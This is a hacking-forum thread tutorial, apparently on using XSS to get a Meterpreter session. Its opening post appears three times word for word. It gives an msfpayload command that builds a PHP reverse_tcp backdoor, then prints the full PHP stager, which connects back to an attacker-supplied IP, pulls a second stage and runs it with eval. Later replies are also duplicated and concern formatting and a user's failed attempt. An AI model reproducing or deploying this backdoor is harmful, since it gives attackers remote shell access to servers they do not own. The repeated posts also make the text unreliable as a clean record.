The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Eleven Years of Service
Posts: 937
Threads: 99
Points: 1NSP
Meterpreter Session through XSS 10-24-2013, 12:49 PM
#1
NOTE: THIS IS A TUTORIAL I MADE IN AN ANOTHER HACKFORUM.
Shell XSS Tutorial
1.Open a terminal and enter "msfpayload php/meterpreter/reverse_tcp LHOST=IP HERE LPORT=4444 R >phpbackdoor.php".
![[Image: 37719,rootbash006T6SXH.png]](http://www.upload-pictures.de/bild.php/37719,rootbash006T6SXH.png)
2.Now, open a new terminal window and enter "msfconsole".
![[Image: 37721,rootrubybin0073ASSS.png]](http://www.upload-pictures.de/bild.php/37721,rootrubybin0073ASSS.png)
3.While waiting for the console to open enter "nano phpbackdoor.php" in the first terminal window. It will look like this when you open it:
![[Image: 37722,rootnano0081SYK0.png]](http://www.upload-pictures.de/bild.php/37722,rootnano0081SYK0.png)
Code:
#<?php
error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = 'IPHERE';
$port = 4444;
$ipf = AF_INET;
if (FALSE !== strpos($ip, ":")) {
# ipv6 requires brackets around the address
$ip = "[". $ip ."]";
$ipf = AF_INET6;
}
if (($f = 'stream_socket_client') && is_callable($f)) {
$s = $f("tcp://{$ip}:{$port}");
$s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
$s = $f($ip, $port);
$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
$s = $f($ipf, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) { die(); }
$s_type = 'socket';
} else {
die('no socket funcs');
}
if (!$s) { die('no socket'); }
switch ($s_type) {
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
# We failed on the main socket. There's no way to continue, so
# bail
die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
while (strlen($b) < $len) {
switch ($s_type) {
case 'stream': $b .= fread($s, $len-strlen($b)); break;
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
}
}
# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();
[b]4.[/b] [color=#FF0000]Now, at the top, remove the hashtag (#) from #<?php.
It will now look like this: "<?php".[/color]
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
•
Eleven Years of Service
Posts: 937
Threads: 99
Points: 1NSP
Meterpreter Session through XSS 10-24-2013, 12:49 PM
#2
NOTE: THIS IS A TUTORIAL I MADE IN AN ANOTHER HACKFORUM.
Shell XSS Tutorial
1.Open a terminal and enter "msfpayload php/meterpreter/reverse_tcp LHOST=IP HERE LPORT=4444 R >phpbackdoor.php".
2.Now, open a new terminal window and enter "msfconsole".
3.While waiting for the console to open enter "nano phpbackdoor.php" in the first terminal window. It will look like this when you open it:
Code:
#<?php
error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = 'IPHERE';
$port = 4444;
$ipf = AF_INET;
if (FALSE !== strpos($ip, ":")) {
# ipv6 requires brackets around the address
$ip = "[". $ip ."]";
$ipf = AF_INET6;
}
if (($f = 'stream_socket_client') && is_callable($f)) {
$s = $f("tcp://{$ip}:{$port}");
$s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
$s = $f($ip, $port);
$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
$s = $f($ipf, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) { die(); }
$s_type = 'socket';
} else {
die('no socket funcs');
}
if (!$s) { die('no socket'); }
switch ($s_type) {
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
# We failed on the main socket. There's no way to continue, so
# bail
die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
while (strlen($b) < $len) {
switch ($s_type) {
case 'stream': $b .= fread($s, $len-strlen($b)); break;
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
}
}
# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();
[b]4.[/b] [color=#FF0000]Now, at the top, remove the hashtag (#) from #<?php.
It will now look like this: "<?php".[/color]
•
Eleven Years of Service
Posts: 937
Threads: 99
Points: 1NSP
Meterpreter Session through XSS 10-24-2013, 12:49 PM
#3
NOTE: THIS IS A TUTORIAL I MADE IN AN ANOTHER HACKFORUM.
Shell XSS Tutorial
1.Open a terminal and enter "msfpayload php/meterpreter/reverse_tcp LHOST=IP HERE LPORT=4444 R >phpbackdoor.php".
2.Now, open a new terminal window and enter "msfconsole".
3.While waiting for the console to open enter "nano phpbackdoor.php" in the first terminal window. It will look like this when you open it:
Code:
#<?php
error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = 'IPHERE';
$port = 4444;
$ipf = AF_INET;
if (FALSE !== strpos($ip, ":")) {
# ipv6 requires brackets around the address
$ip = "[". $ip ."]";
$ipf = AF_INET6;
}
if (($f = 'stream_socket_client') && is_callable($f)) {
$s = $f("tcp://{$ip}:{$port}");
$s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
$s = $f($ip, $port);
$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
$s = $f($ipf, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) { die(); }
$s_type = 'socket';
} else {
die('no socket funcs');
}
if (!$s) { die('no socket'); }
switch ($s_type) {
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
# We failed on the main socket. There's no way to continue, so
# bail
die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
while (strlen($b) < $len) {
switch ($s_type) {
case 'stream': $b .= fread($s, $len-strlen($b)); break;
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
}
}
# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();
[b]4.[/b] [color=#FF0000]Now, at the top, remove the hashtag (#) from #<?php.
It will now look like this: "<?php".[/color]
•
Eleven Years of Service
Posts: 841
Threads: 48
Points: 0NSP
RE: Meterpreter Session through XSS 10-24-2013, 03:58 PM
#4
I would advise using the code tags to make the thread look nicer.
•
Eleven Years of Service
Posts: 841
Threads: 48
Points: 0NSP
RE: Meterpreter Session through XSS 10-24-2013, 03:58 PM
#5
I would advise using the code tags to make the thread look nicer.
•
Eleven Years of Service
Posts: 841
Threads: 48
Points: 0NSP
RE: Meterpreter Session through XSS 10-24-2013, 03:58 PM
#6
I would advise using the code tags to make the thread look nicer.
•
Eleven Years of Service
Posts: 937
Threads: 99
Points: 1NSP
RE: Meterpreter Session through XSS 10-24-2013, 05:36 PM
#7
(10-24-2013, 03:58 PM)Ergo Proxy Wrote: I would advise using the code tags to make the thread look nicer.
Okay, thanks!
•
Eleven Years of Service
Posts: 937
Threads: 99
Points: 1NSP
RE: Meterpreter Session through XSS 10-24-2013, 05:36 PM
#8
(10-24-2013, 03:58 PM)Ergo Proxy Wrote: I would advise using the code tags to make the thread look nicer.
Okay, thanks!
•
Eleven Years of Service
Posts: 937
Threads: 99
Points: 1NSP
RE: Meterpreter Session through XSS 10-24-2013, 05:36 PM
#9
(10-24-2013, 03:58 PM)Ergo Proxy Wrote: I would advise using the code tags to make the thread look nicer.
Okay, thanks!
•
Eleven Years of Service
Posts: 16
Threads: 6
Points: 0NSP
RE: Meterpreter Session through XSS 01-23-2014, 10:27 PM
#10
anyone knows why i opened a meterpreter session with my own PC when i tried to use php/meterpreter/reverse_tcp payload even though my other pc opened the link?
![[Image: ip12.png]](http://imagizer.imageshack.us/v2/800x600q90/856/ip12.png)
•
Users browsing this thread: 1 Guest(s)
